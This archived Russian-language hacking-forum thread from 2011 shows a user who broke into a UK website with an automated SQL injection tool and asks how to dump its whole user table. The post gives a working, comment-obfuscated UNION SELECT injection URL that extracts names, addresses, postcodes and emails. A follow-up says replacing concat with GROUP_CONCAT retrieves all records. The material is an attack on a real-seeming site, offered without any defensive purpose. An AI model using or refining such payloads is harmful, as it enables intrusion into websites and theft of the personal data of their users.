1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

Небольшая проблема со скулей

Тема в разделе "Web-хакинг, уязвимости CMS, эксплоиты", создана пользователем SG123, 10 ноя 2011.

  1. SG123

    SG123 Новичок

    Регистрация:
    22 фев 2011
    Сообщения:
    14
    Симпатии:
    3
    Баллы:
    0
    вобщем раскрутил сайт с помощью havij, снифером вытащил запрос что бы вставить в дампер, и столкнулся с проблемой.

    Выводит только одного пользователя.
    Если я праивльно понял за это отвечает limit.

    Переделываю запрос, но похоже гдето туплю и вместо всего списка выводится ошибка

    Код:
    http://www.sait.co.uk/news_full.php?id=999999.9'/**//*!30000union/**/all/**/select/**/(select/**/concat(id,0x5e,name,0x5e,address,0x5e,postcode,0x5e,email)/**/from/**/`trakkerp_trakker`.users/**/limit/**/1,1)/**/,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536*//**/and/**/'x'='x
    помгите довести до ума
     
    Последнее редактирование: 11 ноя 2011
  2. SG123

    SG123 Новичок

    Регистрация:
    22 фев 2011
    Сообщения:
    14
    Симпатии:
    3
    Баллы:
    0
    Все проблему решил, /**/limit/**/1,1) надо убрать, а concat заменить на GROUP_CONCAT.

    Вот только дамперу теперь не нравится, дампит первую запись до бесконечности остальные игнарирует
     

Поделиться этой страницей